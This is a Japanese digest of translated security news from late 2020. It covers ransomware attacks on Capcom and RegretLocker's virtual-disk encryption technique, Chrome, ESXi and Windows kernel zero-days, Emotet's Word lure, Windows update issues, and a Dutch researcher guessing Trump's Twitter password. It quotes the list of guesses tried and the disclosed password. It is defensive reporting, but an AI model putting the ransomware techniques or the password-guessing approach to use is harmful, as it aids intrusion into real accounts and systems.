     「この問題を防止し、セーフガードホールド(【訳注】 アップグレードするとトラブルになることが確認されているハードウェアやソフトウェアがインストールされている環境に対し、不具合の修正が完了するまでの間、アップデートの提供を一時的に停止(ブロック)する措置のこと(窓の杜より))を受け取らないようにするには、Windows 10バージョン2004やWindows 10バージョン20H2にアップデートする前に、全ての組み込みユーザの名前をDefault名に戻す必要がある」と、Microsoftは発言している。
    この問題の完全修正版は、Microsfotが調査を開始した直後なので当分利用できるようにならない、そこで、ここで利用できる指示を使用して以前のWindows 10に戻すことで、この問題を解決することができる。
     「既にあなたのデバイス上でこの問題に遭遇しているのであれば、アンインストール ウィンドウは、環境設定とアップデートのバージョンに応じて10日もしくは30日になっているかもしれない」と、Microsoftは発言している。
    続けて、「あなたは、この問題を解決した後、Windows 10の最新バージョンにアップデートする必要がある」と、Microsoftは発言している。
     あなたは、以下のDISMコマンド(必ず、Defaultのアンインストール ウィンドウが消滅する前に、これを実行しなさい)を使用してWindows 10を以前のバージョンに戻せる期間を数日増やすこともできる。

    DISM /Online /Set-OSUninstallWindow /Value:[days]

     あなたは、このコマンドの引数として2から60の間を選択できる。2より小さく、60より大きな値を指定した場合は、アップグレード後、アンインストールを開始できる日数は、自動的に10日にセットされる。
     本日、Microsoftは、Windows 10 2004または、20H2を実行しているデバイスに影響を及ぼし、ユーザーがThunderbolt NVMe(Non-Volatile Memory Express)ソリッドステートドライブ(SSD)を接続すると、Blue Screen of Dethでクラッシュするという、2つ目の問題に関する追加の互換性保持を適用している。


    カプコン(Capcom)がLocker身代金要求型マルウェアによって攻撃されている
    Threatpost : Blog (2020/11/05)
     伝えられるところによると、ビデオゲームの巨人Capcomが、身代金要求型マルウェア攻撃で特定のシステム(E-Mailとファイルサーバーを含む)に影響がでており、1TBもの重要なデータが暗号化されている。
     日本のビデオゲーム開発販売企業は、Resident Evil(ハイパーバイザー), Street Fighter(ストリートファイター)、 Darkstalkers(アジア圏: ヴァンパイア、アジア圏以外: ダークストーカーズ)を含む数百万を売り上げたゲームを開発している。最初に、この企業は月曜日の朝にサイバー攻撃を検出した。そして、このハッキングがサードパーティによって実行された非認証アクセスに起因することを確認した。そして、その日遅く、内部ネットワークの一部の操作を停止した。
     「関係各位には、多大なるご迷惑をおかけすることになり、深くお詫び申しあげます。」と、Capcomは水曜日のアドバイザリで発言している。続けて「また、現時点では顧客情報等の漏洩は確認されておりません。なお、本障害は当社ゲームをプレイするためのインターネット接続や、当社ホームページ等へのアクセスに悪影響をおよぼすものではございません。」と続けている。
     現在、Capcomは、警察をはじめとする関係各所に相談しており、システムの復旧に向け対応中である。現時点で、攻撃が開始された方法に関する詳細は記されていない。
     BleepingComputerによると、身代金要求型マルウェアRagnar Lockerが、このサイバー攻撃に使用された。身代金要求型マルウェアRagnar Lockerは、仮想マシンを介して身代金要求型マルウェアのペイロードを拡散することでよく知られているマルウェア株である。特にRagnar Lockerの背後にいる攻撃者は、4月のEnergias de Portugal (EDP)(【訳注】 ポルトガルを拠点とする電力事業者の通称)の北米ネットワーク攻撃のように、ネットワークを暗号化する前にデータを盗むことで知られている。サイバー攻撃者は、10TBの重要な企業データを盗んだと主張しており、1,580 Bitcoin(約1100万ドル)の支払いを要求している。
     BleepingComputerは、攻撃下にあるCapcomのコンピュータ上に存在していた脅迫文にアクセスしている。この脅迫文は、この身代金要求型マルウェアのギャングが、銀行の明細書、財務ファイル、知的財産、企業の契約や協定、秘密保持契約、および民間企業の文書(E-Mail、マーケティング プレゼンテーション、監査レポートのような)1TBを超える企業データをダウンロードしたと主張している。BleepingComputerによると、この脅迫文はまた、この身代金要求型マルウェアWebサイト上のプライベート データ リークページへのリンク、並びに、Ragnar Locker Tor交渉サイトへのリンクを含んでいる。
     「レポートによると、Ragnar Locker身代金要求型マルウェアを活用しているオペレータは、この攻撃の責任を負うが、Capcomは、これを直接確認していない」と、Digital ShadowsのCyber Threat Intelligence AnalystであるJamie Hartは、Threatpostに告げている。「脅威のアクターは、高額を支払う可能性があるビデオゲーム産業の企業をターゲットにしているかもしれない」とも告げている。
     この攻撃は、脅威のアクターが、ビデオゲーム開発組織をターゲットにしていることを観察された初めてのことではないと、Hartは発言している。例えば、Egregor身代金要求型マルウェアのオペレータは、10月にゲーム開発企業UbisoftとCrytekをターゲットにした。更に、Sodinokibi (REvil)身代金要求型マルウェアのオペレータは、伝えられているところによると、将来ビデオゲームの大企業をターゲットにした攻撃をすると約束したと報告されている。
     2020年では、これまでの流行としては、身代金要求型マルウェア攻撃が全体として増加している。サイバー犯罪者は、病院から米国大統領選挙の間の地方自治体大学まで、あらゆるものを標的にしている。


    VMwareは緊急のESXiフローの修正アップデートをリリースした
    Security Week : Vulnerabilities(2020/11/04)
     VMwareは水曜日、緊急の脆弱性に関して先月リリースした修正を検証した後、ESXiに関する新しいパッチをリリースしたと顧客に通知した。
     CVE-2020-3992として追跡されるこの脆弱性は、ESXi中のOpenSLPサービスに影響を与えるUse-After-Free(【訳注】 開放したメモリに対して(脆弱性により)再びアクセス、実行することが可能となることを悪用した攻撃を可能にするフロー(サイバー攻撃大辞典より))のバグとして説明されている。認証されていないリモートの攻撃者は、任意のコードを実行するために、このフローを攻撃している。
     しかしながら、攻撃者が、このフローを攻撃するには管理ネットワークに存在する必要があり、ESXiマシンのポート427にアクセスする必要があると、VMwareは発言していた。
     VMwareは、Trend MicroのZero Day Initiative (ZDI)のLucas Leongから、6月にこのセキュリティホールについて学習した。アドバイザリはまた、ZDIによって10月に公開された。
     「この特定のフローは、SLPメッセージのプロセス中に存在している。この問題は、オブジェクトの操作を実行する前に、そのオブジェクトの存在の検証が不足していた結果である。攻撃者は、SLPデーモンのコンテキスト中でコードを実行するために、この脆弱性を利用することができる」と、ZDIは発言している。
     VMwareは水曜日、当初のパッチが不完全であったと顧客に通知し、当初のアドバイザリを更新した。新しい修正は、ESXi 6.5, 6.7, 7.0としてリリースされたが、仮想マシンの管理とコンテナのオーケストレーションを行うためのハイブリッド クラウド プラットフォームであるVMware Cloud Foundation用のパッチは保留されたままである。
     VMwareが一回目で脆弱性のパッチに失敗したのはこれが初めてではない。今年初め、FusionのmacOSバージョンに影響する特権の昇格のフローに関するパッチを数回実行している。


    デスクトップとAndroidの両方にリスクのあるChromeの0-Dayが攻撃されている
    The Register : Security(2020/11/04)
     最新のアップデートでGoogle Chromeをパッチしなさい。パッチしていないのであれば、あなたには攻撃されている0-Dayの脆弱性があると、米国の国土安全保障省国家保護・プログラム総局(Cybersecurity and Infrastructure Security Agency、CISA)が警告している。
     サイバー犯罪者は、期限切れバージョンのChromeのユーザをターゲットにしていると、CISAは、そのアドバイザリにおいて、即座にブラウザをアップデートするよう人々を促している。
     「Googleは、この複数の脆弱性(CVE-2020-16009を含む)を解決するChromeのバージョン86.0.4240.183(Windows, Mac, Linux用)をリリースした。この脆弱性の攻撃コードはオンライン上に存在している。」と、CISAはその声明中で発言している。
     この脆弱性は、Chromeのデスクトップ版に影響を及ぼし、GoogleのProoject Zero情報セキュリティチームによって公開されているリモートコード実行のバグである。このバグは、GoogleのオープンソースJSとWebAssemblyエンジンであるV8中に存在している。この脆弱性の詳細は、この記事を記述している時点では、CVE-2020-16009のMITREエントリ(【訳注】 脆弱性の識別番号であるCVE-IDを管理している企業(McAfee Blogより))を介した公開ドメイン中には未だ存在していない。この脆弱性は、「リモード攻撃者が、巧みに細工されたHTMLページを介して、ヒープ損壊攻撃を可能にするものである。」
     悪者共は、利用可能な情報の欠乏にもかかわらず、既にこの脆弱性を明らかに解明している。
     「Googleは、CVE-2020-16009に対する脆弱性攻撃が実際に存在するとするレポートを認識している」と、いつも通りおしゃべりなChocolate Factory(【訳注】 Googleの別称)は発言している。
     ChromeのAndroidバージョン用のパッチは、積極的な攻撃下にあるCVE-2020-16010として追跡される脆弱性(AndroidのUIで「ヒープ バッファオーバーフロー」としてのみ説明されている)を修正している。
     Googleの簡単な説明、完全な責任、更新が遅い人々に勝利する方法に関するインターネット情報を、あらゆるScript Kiddie(【訳注】 他人の製作したプログラムまたはスクリプトを悪用し、興味本位で第三者に被害を与えるクラッカーの俗称(Wikipediaより))に渡したくないことから情報は僅かであるが、AndroidのChromeユーザは、実行しているバージョンが86.0.4240.185であることを確認する必要がある。


    何者かが10億BitCoinあったWalletをスッカラカンにした
    BleepingComputer : News>Security(2020/11/04)
     パスワードで保護されており粗10億BitCoinあったWalletが、スッカラカンにされた。
     謎は、この疑わしい取引と、最終的に巨大な額を現金化した団体に取り巻かれている。
     それは、所有者自身なのか、何者かがこのWalletをクラックしたのか?

    一日でBitCoinはWalletから引き出された

     以下に示すように、このBitCoinのWallet(アドレス1HQ3Go3ggs8pFnXuHVHRytPCq5fGG8Hbhxで同定される)は、この投票日に巨大な取引をした。
     2020年11月03日には、このWalletは、69369.16628020 BitCoin存在していた。これは、凡そ9億5700万 US$(約998億6300万円)になる。

    Blockchain取引履歴は、このBitCoin Walletに69369 BTCを超える額があったことを示している(画像をクリックすると拡大表示されます)

     一晩で、このWalletの額は、不思議なことに、巨大な額が現金化された後、僅か1.38US$になった。
     Blockchain取引の匿名性を考えると、この金額を受け取ったのが誰なのかを知ることは困難である。

    一晩で1.38US$になったWallet(画像をクリックすると拡大表示されます)

     この重大事案は、Hudson Rockの共同設立者でCTO(【訳注】 最高技術責任者)であるAlon Galによって報告された。
     この驚くべき取引を確認し、Galは以下のようにTweetしている。
     「信じられない、私が少し前に報告したように、何者かが、BitCoin Walletのパスワードをクラックし、その中にあった$1,000,000,000を使うことができたなんて!」

    2015年以降Walletはハッカーの間で流通している

     このWalletはハッカーとの関連付けにおいて取り分け興味を引いた。
     Galは、少なくとも今年の9月以降、このBitCoinアドレスを監視してきた。クラックに成功した者はいない。
     「聞いてくれ、このパスワードをクラックするために過去2年間ハッカー/クラッカーの間で回されている69,000BitCoin($693,207,618)の入ったWalletがある。今まで成功していない」と、更に「私は財布を持っている、@Googleは、どうか私を量子コンピュータに接続して下さい」と、Galは以前に発言している。
     Galは、出金取引は、このWalletによって生成された最近の風評への対応として、そのWalletの本来の所有者が実行したか、あるいは、そのパスワードをクラックした者によって実行されたと疑っている。
     Galによると、このWalletは、デビット取引に関しては2015年以来「休眠状態」であった。
     休眠状態のアカウントから10億ドルのデビット取引は疑わしく見えるので危険信号が発せられる。
     2020年6月、評価額10億ドルの他のBitCoin Walletが不思議にも空にされた
     BitCoin台帳で実行される取引は公開されるが、暗号通貨ユーザに保証される匿名性の付与は、この金銭の追跡を困難にしている。
     しかしながら、この金銭の流れを追跡することは、暗号通貨であっても可能である。そして、発生する恐れのあるマネー・ロンダリングのような不法行為は、金融および規制当局に対して明らかにされるだろう。


    新しいRegretLocker身代金要求型マルウェアはWindows仮想マシンをターゲットにしている
    BleepingComputer : News>Security(2020/11/03)
     RegretLockerと呼ばれる新しい身代金要求型マルウェアは、仮想ハードドライブを暗号化し、暗号化のためにオープン-ファイルを閉じることを可能にする様々な高度な機能を使用している。
     RegretLockerは、10月に発見された。この身代金要求型マルウェアは、長い脅迫文を持っておらず、Tor支払いサイトではなくE-Mailを使用してコミニケーションするところの見かけは単純な身代金要求型マルウェア(ランサムウェア)である。

    RegretLockerの脅迫文(画像をクリックすると拡大表示されます)

     RegretLockerは、ファイルを暗号化している時、暗号化されたファイル名に無害に見えそうな .mouse 拡張子を追加する。

    RegretLockerで暗号化されたファイル(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアは見かけに欠けているものの、以下に説明するように、通常、身代金要求型マルウェア感染には見られない高度な機能で補われている。

    RegretLockerは仮想ハードディスクをマウントする

     Windows Hyper-V仮想マシンを作成する時、仮想ハードディスクが作成され、VHDもしくはVHDXファイル中に格納される。
     これらの仮想ハードディスクファイルは、ナマのディスクイメージ(ドライブのパーティションテーブルとパーティションを含む)を含んでいる。そして、通常のディスクドライブのように、幾つかのギガバイトからテラバイトにサイズを変更することができる。
     身代金要求型マルウェアがコンピュータ上でファイルを暗号化する時、大きなファイルを暗号化することは、全体の暗号化プロセスをスローダウンするので効果的ではない。
     MalwareHunterTeamによって発見され、Advanced IntelのVitali Kremezによるこの身代金要求型マルウェアのサンプルの解析で、RegretLockerは、仮想ディスクファイルをマウントし、そのファイルを個別に暗号化できる高度なテクニックを使用していた。
     これを実行するために、RegretLockerは、Windows Virtual Storage APIのOpenVirtualDisk, AttachVirtualDisk, GetVirtualDiskPhysicalPath関数を使用して仮想ディスクをマウントしている。

    VHDファイルのマウント(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアのデバッグ メッセージに表示されているように、VHDを具体的に検索し、検出されると、それらをマウントしている。

    parse_files() | Found virtual drive: %ws in path: %s

    Windowsの物理ディスクのように仮想ドライブがマウントされると、この身代金要求型マルウェアは、夫々を個々に暗号化することができるので、暗号化のスピードを上げることができる。
     VHDをマウントするために使用されているコードは、セキュリティ研究者smelly__vxによって最近発表された研究から取得されている。
     更に、Virtual Storage APIを使用しているために、RegretLockerはまた、プロセスもしくは暗号化している間ファイルを開いたままにするWindowsサービスを終了させるためにWindows Restart Manager APIを利用している。
     Kremezは、このAPIを使用している時、プロセスの名前に'vnc', 'ssh', 'mstsc', 'System', 'svchost.exe'を含まれていると、この身代金要求型マルウェアは、そのプロセスを終了しないだろうとBleepingComputerに告げた。この例外リストは、多分重要なプログラムや、脅威の攻撃者によって改竄されたシステムにアクセスするために使用される。

    Windows Restart Manager例外リスト(画像をクリックすると拡大表示されます)

     Windows Restart Manager機能は、REvil (Sodinokibi), Ryuk, Conti, ThunderX/Ako, Medusa Locker, SamSam, LockerGogaのような幾つかの身代金要求型マルウェアによって使用されているだけである。
     RegretLockerは、この時点で大変アクティブであるとは言い難いが、注目し続けることが必要な新しいファミリーである。


    Windowsカーネルの0-Dayの脆弱性が標的型攻撃に使用されていた
    BleepingComputer : News>Security(2020/10/30)
     GoogleのバグハントチームであるProject Zeroは、本日、Windowsカーネル中に発見され、積極的な標的型攻撃を受けていた0-Dayの権限の昇格に関する脆弱性を公開した。
     このフローは、WindowsカーネルのCryptography Driver (cng.sys)に存在しているプールベースのバッファオーバーフローであり、現在、CVE-2020-17087として追跡されている。

    利用可能な脆弱性攻撃の脆弱性の証明

     Project Zeroのセキュリティ研究者Mateusz JurczykとSergei Glazunovによると、Windowsカーネルの0-Dayのバグは、権限の昇格(サンドボックス保護メカニズムの回避を含む)に関して特定の攻撃者によって悪用されていた。
     「このバグは、cng!CfgAdtpFormatPropertyBlock関数中に存在し、16bit Integer切り捨て問題が原因である」と、この研究者達は説明している。
     Project Zeroはまた、システム設定がDefaultであっても、脆弱性のあるWindowsデバイスをクラッシュするために使用することができる脆弱性の証明を提供している。
     この脆弱性の証明は、「最新のWindows 10 1903(64bit)でテストされたが、この脆弱性は少なくともWindows 7以降に存在していると考えられている。」

    この問題に関連するBen HawkesのTwitterへのリンク

    この攻撃はアメリカの選挙に関連していない

     Ben Hawkes(GoogleのProject Zeroセキュリティチームの技術チームのリーダー)によると、オンライン上でCVE-2020-17087を悪用する現在実行されている攻撃は、アメリカの選挙を標的として関連付けられていない。
     「現在、我々はこの問題のパッチが11月10日に利用可能になることを期待している」と、GoogleのProject Zeroセキュリティチームの技術チームのリーダーBen Hawkesは発言している
     「我々は、Googleの脅威解析グループのディレクターShane Huntleyと共に、この攻撃が標的型攻撃であり、アメリカの選挙を標的にしていないということを確認した」
     このバグは、僅か8日前にProject Zero issue trackerに追加されたが、オンライン上で既に攻撃者によって使用されているために7日後に公開された。
     先週、Googleはまた、Project Zero研究者によってGoogle Chromeブラウザ中に発見された積極的に攻撃されている0-Dayの脆弱性を修正した。
     「ProjectZeroは、Chromeを標的にして使用されていたfreetypeで積極的に悪用された0-dayを発見し、報告した」とHawkesは当時述べている。

    トランプの公式キャンペーンサイトが「この大統領の十分な数のフェイクニュースを持っている」とするハッカーによって破壊された
    The Register : Security(2020/10/28)
     ドナルド・トランプ大統領のキャンペーンWebサイトが、今夜簡単にハックされ破壊された。
     このサイト(donaldjtrump.com)は、詐欺師やテロリストに対して米国当局がアナウンスするドメイン名押収をパロディーにしたメッセージで置き換えられた。そこには、米国政府の印章と並べて、「世界には毎日、大統領Donald J Trumpによって拡散されるフェイクニュースが沢山あるため、このサイトを押収した」とする主張がある。
     このサイトは、太平洋時16:30(世界標準時23:30)頃、この破壊に人々が気付いてから30分後に通常に戻された。これは、トランプが、197のIQを持ち、あなたのパスワードの凡そ15%を必要とする者でない限り、「誰もハックできない」と発表した後に実行された。これは、政府と企業ネットワークに侵入するために悪党によって攻撃される脆弱性に関するHomeland Security(米国国土安全保障省)とNSA(米国国家安全保障局)による、より緊急度の高い勧告に従うことでもある。
    トランプのハイジャックされたWebサイトがどのようであったかを以下に示す。

    (画像をクリックすると拡大表示されます)

     この汚されたドットコムは、人々から暗号通貨を収穫する策略として、大統領を信用しない証拠のリークに賛成なのか反対なのかで用意された二つの財布へMoneroデジタル通貨を寄付するようにネット市民に依頼していた。このページはまた、他の野蛮な主張の中に「複数のデバイスが、トランプと関係者へのフルアクセスを与えるように改竄された」とも主張している。
     トランプ キャンペーンのスポークスマンは、NBC Newsに「Webサイトは汚された、そして、我々は、攻撃の源泉を調査するために法執行機関と共に作業した」更に続けて「このサイトに実際に重要なデータは格納されていないので、重要なデータの漏洩はない」と告げている
     米国では、11月03日、次の四年間を誰が担うのか(共和党の現職Donald Trumpか、民主党の候補者Joe Bidenか)を決定する投票が行われる。


    Microsoft: WindowsからAdobe Flashを削除するアップデートをリリース
    BleepingComputer : News>Security(2020/10/27)
     Microsoftは、WindowsからAdobe Flashを削除し再インストールを妨げるKB4577586アップデートをリリースした。
     2020年9月に、Microsoftは、Adobe Flash Playerをアンインストールし、同じデバイスに再インストールすることを妨げるオプションの更新プログラムが、秋にはリリースされるだろうとアナウンスしていた。
     本日、Microsoftは、"Update for the removal of Adobe Flash Player: October 27, 2020" KB4577586アップデートをリリースした。このアップデートは、Windows 10とWindows Serverの全てのバージョンからAdobe Flashを削除する。

    Windows 10 KB4577586アップデート

     このオプションの更新プログラムは、Microsoft Catalogを介してのみ利用可能であり、一旦インストールすると、後で削除することはできない。
     このアップデートが存在するデバイス上にAdobe Flash Playerをインストールしたい人は、そのデバイスを以前のリストアポイントに戻すか、Windows 10を最初から入れなおさなければならない。
     インストールすると、Adobe Flash Playerは自動的に削除されると、Microsoftは述べている。けれども、我々のテストでは、このアップデートをインストールした後も、Adobe Flash Playerは、以下に示すように存在していた。

    インストールされたままのAdobe Flash(画像をクリックすると拡大表示されます)

     Microsoft Edge上でAdobe Flashをチェックすると、このアップデートをインストールした後も、Adobe Flashはインストールされたままだった。このテストは、EdgeでFlashを有効にし、https://helpx.adobe.com/jp/flash-player.html(リンクを日本語サイトに変更)をチェックして行われた。

    Microsoft Edge中のAdobe Flashコンポーネント(画像をクリックすると拡大表示されます)

     BleepingComputerはMicrosoftに接触し、このアップデートが我々のテストでFlash Playerを削除しなかった理由を特定した。
     このアップデートは、Flashが提供終了(【訳注】 Adobe Flash Playerの提供終了は、2020年12月31日)された後の、2021年の早い時期に、Flash Playerの大規模な削除を実行するためにWSUS(Windows Server Update Services)とWindowsアップデートを介して利用されると、Microsoftは述べている。


    現在Windows 10が非表示にしているSYSTEMコントロールパネルへのアクセス方法
    BleepingComputer : News>Security(2020/10/25)
     Windows 10 20H2のリリースに伴い、Microsoftは現在、由緒あるSYSTEMコントロールパネルへのアクセスを妨げ、代わりに、新たにアップデートされた’About'設定ページにユーザをリダイレクトしている。
     SYSTEMコントロールパネルは、Windows NT 3.51とWindows 95で最初に導入され、インストールされているWindowsのバージョン、オペレーティングシステムのビットタイプ、コンピュータ名、ワーキンググループ、CPU、メモリに関する情報を提供している。
     コントロールパネルは、そのコンピュータに関する多くの情報を提供しているので、Windows PCのトラブルシューティングやコンピュータの基本情報を確認するときに広く使用されてきた。

    SYSTEMコントロールパネル(画像をクリックすると拡大します)

     7月にBleepingComputerは、Microsoftが全てではないもののSYSTEMページで発見される殆どの情報を含むように'About'設定ページをアップデートしたとレポートした。その時点で、MicrosoftはSYSTEMコントロールパネルを開こうとするとAboutページにユーザーをリダイレクトする機能をコッソリ試していた。

    アップデートされたAbout設定ページ(画像をクリックすると拡大します)

    Windows 10 20H2で、Microsoftはコントロールパネルを破滅に導き、現在、ユーザがSYSTEMコントロールパネルにアクセスすることを妨げている。現在、ユーザがSYSTEMコントロールパネルを開こうとすると、Aboutページが表示される。
     最新のディスクマネージメント ツールリフレッシュレート オプションのテストと、'Program and Features'(プログラムと機能)コントロールパネルを'Apps & Features'(アプリケーションと機能)にリダイレクトするテストで、我々は、Microsoftが徐々にコントロールパネルを削除していることを確認した。
     最終的には、Windows 10では、設定が様々な場所に配置されていて紛らわしいので、これは適切なことである。設定機能に組織化することで、特定の設定を見つけやすくなる。
     日常的に、SYSTEMコントロールパネルを使用している人々への良いニュースは、依然としてSYSTEMコントロールパネルにアクセス可能であるということである。以下にアクセス方法を示す。

    Windows 10 20H2でSYSTEMにアクセスする方法

     MicrosoftはSYSTEMコントロールパネルをリダイレクトしているが、特別に細工されたWindowsショートカットでアクセスする方法がある。
     SYSTEMコントロールパネルを開くショートカットを作成するには、以下のステップに従う。
    1/ 開いている全てのアプリケーションとフォルダを最小化して、Windowsデスクトップだけが表示されている状態にする。
    2/ デスクトップを右クリックし、新規作成 > ショートカット を選択する

    新しいショートカットを作成する

    3/ ショートカット ダイアログが開いたら、ショートカットのフィールドにexplorer shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE} をコピー・アンド・ペーストする。次にNextボタンを押す。

    SYSTEMショートカットの作成

    4/ これで、このショートカットに名前を付けるページが表示される。名前を付ける欄にSYSTEMと入力し、Finishボタンを押す。

    SYSTEMショートカットの作成

    5/ SYSTEMと名付けられたショートカットが、デスクトップに作成されている。SYSTEMコントロールパネルを開くときには使用することができる。

    新しいSYSTEMショートカット

     このSYSTEMショートカットは、スタートメニューで'SYSTEM'を検索し、アプリケーションセクションに表示されたアイコンを選択することで、直接起動することも可能である。
     ある時点で、MicrosoftはSYSTEMコントロールパネルを完全に削除してしまう可能性がある。これに伴い、このショートカットは機能しなくなる。


    EmotetマルウェアはMicrosoft Wordをアップグレードするよう呼びかけている
    BleepingComputer : News>Security(2020/10/24)

    画像をクリックすると拡大します

     Emotetは、今週Microsoft Officeからのメッセージを装う新しいテンプレートに変更した。これには、新しい機能を追加するためにMicrosoft Wordをアップグレードする必要があると述べられている。
     Emotetは、悪意あるマクロを添付したWordドキュメントを含むE-Mailを介して拡散するマルウェアである。これらのドキュメントを開くと、それらのコンテンツはユーザを欺きマクロを有効にする。そこで、Emotetマルウェアが、そのコンピュータ上にダウンロードされインストールされることになる。
     このマルウェアがインストールされると、Emotetは、スパムメールを送信するために、そのコンピュータを使用し、果ては、犠牲者のネットワーク上に身代金要求型マルウェア(ランサムウェア)攻撃を導くことができる。

    新しい悪意あるドキュメントテンプレート

    Emotetは、受信者を欺き添付ファイルを開かせるために様々な誘惑(以下に示すように、請求書、出荷通知、履歴書、注文書、さらにはCOVID-19(【訳注】 新型コロナウィルス)情報を装う)を使用している。

    Emotetのスパムメールの例(画像をクリックすると拡大します)

     これらのスパムメールに添付されているファイルは、悪意あるWord(.doc)、もしくは、そのファイルをダウンロードさせるためのリンクである。
     これらの添付ファイルが開かれると、ユーザに"Enable Content(コンテンツの有効化)"するように促し、犠牲者のコンピュータ上にEmotetマルウェアをインストールする。
     ユーザを欺きマクロを有効にさせるために、Emotetは、様々なデザイン、あるいはドキュメントテンプレートを使用してユーザに警告を表示する。
     Emotetは今週、新しい機能を追加するためにMicrosoft Wordをアップグレードする必要があるというMicrosoft Officeを装う新しいテンプレートに変更した。

    ・ Upgrade your edition of Microsoft Word(Microsoft Wordをアップグレードしなさい)
    ・ Upgrading your edition will add new feature to Microsoft Word.(アップグレード版はMicrosoft Wordの新しい機能が追加されている)
    ・ Please click Enable Editing and then click Enable Content.(文書内の編集を有効にするをクリックし、次に、コンテンツの有効化をクリックして下さい)

     このドキュメントは、Microsoft Wordをアップグレードするために、Enable Editing(文書内の編集を有効にする)とEnable Content(コンテンツの有効化)ボタンをクリックするように、ユーザに告げている。これは、悪意あるマクロを実行させることになる。

    新しくアップグレードされたMicrosoft WordのEmotet添付ファイル(画像をクリックすると拡大します)

     これらの悪意あるマクロは、以下に示すように、Emotetマルウェアを犠牲者の%LocalAppData%フォルダ(【訳注】 この環境変数は、C:\Users\ユーザー名\AppData\Local を指しています)にダウンロードする

    WindowsにインストールされたEmotetマルウェア(画像をクリックすると拡大します)

    何故Emotetの添付ファイルを認識する必要があるのか?

     Emotetは今日、ユーザを標的にしている最も広範に拡散しているマルウェアであると認識されている。このマルウェアは、犠牲者のコンピュータ上にTrickbotやQBotのような他の感染体をインストールするのでとりわけ危険である。
     TrickbotやQBotがインストールされると、格納されているパスワード、銀行情報、格納されている他の情報を盗もうとするだけでなく、Conti(TrickBot)ProLock(QBot)身代金要求型マルウェアの攻撃を導く。
     このため、全てのE-Mailユーザは、Emotetによって使用されている悪意あるドキュメントテンプレートを認識することが重要である。そうすることで偶発的感染を回避することができる。


    ハッカーによると、ドナルド・トランプのTwitterパスワードは”maga2020!”であり、二要素認証は使われていなかった
    Graham Cluley : News (2020/10/23)
     先月、ハッカー達は2016年にドナルド・トランプのパスワードをクラックしていたという驚くべき主張をした。
     その時に、米国大統領候補が使用していたパスワードは、”yourfired”であった。
     これはまるでなってないことであるが、大統領職の多くをTwitterに費やしてきたドナルド・トランプは、このことから、何らかの教訓を学んだのだろうか?
     オランダの善良なハッカーであるVictor Geversによると、先週、米国大統領@realDonaldTrumpアカウントが、恐ろしいほど馬鹿げたパスワード”maga2020!”で保護されており、二要素認証は無効になっていた。
    Geversは、悲しく哀れな”maga2020!”に到達する前に、以下の幾つかのパスワードを試したと発言している。

      ・ !IWillAmericaGreatAgain!
      ・ MakeAmericaGreatAgain
      ・ MakeAmericaGreatAgain!
      ・ Maga2020
      ・ Maga2020!
      ・ maga2020!

     Geversは、彼がドナルド・トランプのプロファイルに対して完全なアクセスを持ったことを示すために、そのスクリーンショットを共有した。
     Geversは、トランプ、彼のチーム、ホワイトハウス、Twitter、そして、CISA(Cybersecurity & Infrastructure Security Agency、国土安全保障省国家保護・プログラム総局)に対してさえ、このセキュリティ問題を通知した。しかし、何の応答もなかった。
     記述している時点(現地時間、10月22日 16:04)で、このパスワードは変更され、二要素認証は有効にされていた。
     正直、唖然としている。この重大事案に関する詳細は、Vrij Nederlandからのレポートを読みなさい。


    Chrome、0-Dayの脆弱性を修正。直ちにアップデートを
    Sophos : NakedSecurity (2020/10/22)
     あなたのブラウザがGoogle Chromeや、Chromiumのような関連製品であるのなら、自動アップデートが動作していることを確認し、最新バージョンであるか否かをチェックしなさい。
     Chromeについて、もしくは、Chromiumについてダイアログに移動し、最新のバージョン 86.0.4240.111 になっていることを確認しなさい。
     昨日(現地時間 10月20日)、リリースされたこのバージョンは、全てのユーザが利用すべき「安定版」である。
     このダイアログで、バージョンが86.0.4240.75であれば、このダイアログを閉じなさい。しかし、未だ以前のバージョンであるのなら、あなたのシステムは未だアップデートされていない。
     Googleの説明では、アドレスバーの右端に円の中に上向きの矢印のアイコンがあれば、保留中の更新があることを示している。
     この時点で、Chromeを一度終了し、もう一度Chromeを起動すると、修正が適用されるはずである。
     あなたが、コンピュータをめったにシャットダウンしない、あるいは、めったにブラウザを終了しない習慣があるのなら、これはChromeがアップデートを取得する「極めて稀な瞬間」になるだろう。
     Chromium(プロプライエタリ部分が付属していないChromeのオープンソースバージョン)ユーザは、通常のアップデート手順に従いなさい。アップデートの手順は、あなたが使用しているオペレーティングシステムと、最初にChromiumを取得した場所に依存する。
     あなたが、この特定のアップデートを取得しなければならない理由は、5つのセキュリティバグ(1つのバッファオーバーフローと3つのUse-After-Free脆弱性(【訳注】 Use-After-Freeとは開放したメモリに対して(脆弱性により)再びアクセス、実行することが可能となることを悪用した攻撃のこと(サイバー攻撃大辞典より)))が修正されたことだけではなく、これらのバグの1つ(CVE-2020-15999)が既にアタッカーによって知られていることにある。
     更新通知で述べられているように、「Googleは、CVE-2020-15999が実際に存在するという報告を認識している。」
     このバグはFreetype中のヒープ バッファオーバーフローとして説明されている。Freetypeは、プログラマが、彼らのアプリケーション中で、あらゆる種類のモダン フォントファイルとフォーマットの使用をサポートすることを可能にするオープンソースのフォント レンダリング ソフトウェア ツールキットである。
     今日、多くのWebページは、必要とされる特定のフォントを含んでいる。例えば、企業のタイプフェースとWOFFs(Web Open Font Formatの頭文字)として知られるそれらのファイルは、必要に応じて使用されるためにブラウザ中にダウンロードされる。
     WOFFファイルは、ユーザーがすでにインストールしている可能性が低いフォントにWebサイトが依存できるようにするだけでなく、失われたり正しく表示されない特定の文字または文字セットをサポートする特定のバージョンのフォントへのアクセスに依存できるようにするためにも使用される。
     それ故、我々は、このバグが、フォントがロードされたり、特定のテキストが表示されたときに、故意にこのバグをトリガーとし、虫も殺さぬように見えているがブービートラップされたフォントファイルを含むWebページに誘導されることで攻撃される可能性があると推測している。

    何をすべきか?

     アップデートしよう!
     この攻撃は、実際に知られているにもかかわらず、Googleは、このアップデートが「今後数日/数週間でロールアウトされる」だろうという、いつも通りのメッセージを含めている。これは、おそらく一部のChromeユーザーがベンダに依存して修正を押しのけている可能性があるからである。
     疑わしい場合は、デバイスメーカーにアドバイスを求めなさい。


    Windows 10 KB4579311アップデートは、インストールされず、Explorerのクラッシュを引き起こす
    BleepingComputer : News>Security(2020/10/20)
     Windows 10ユーザは、最新のKB4579311累積アップデートで多くの問題に直面している。インストールできた人々は、パフォーマンス問題を含む様々なバグを報告している。
